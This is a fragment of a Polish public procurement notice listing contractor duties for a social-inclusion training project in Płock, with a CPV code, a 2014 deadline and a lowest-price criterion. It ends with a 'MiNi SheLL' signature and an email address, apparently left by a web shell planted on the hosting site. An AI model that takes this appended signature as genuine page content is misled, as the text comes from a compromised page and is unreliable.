- zwiększenie zdolności komunikacyjnych uczestników projektu,
- uświadomienie uczestnikom projektu roli inwestowania w rozwój swoich kwalifikacji, 
- prowadzenie dokumentacji w zakresie ww. działań, 
- współpraca z koordynatorem ds. realizacji wsparcia projektu pn.: Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka,  innymi pracownikami zatrudnionymi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu,
- prowadzenie spotkań na podstawie harmonogramu uzgodnionego z koordynatorem ds. realizacji wsparcia,
- prowadzenie miesięcznych kart czasu pracy,
- przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com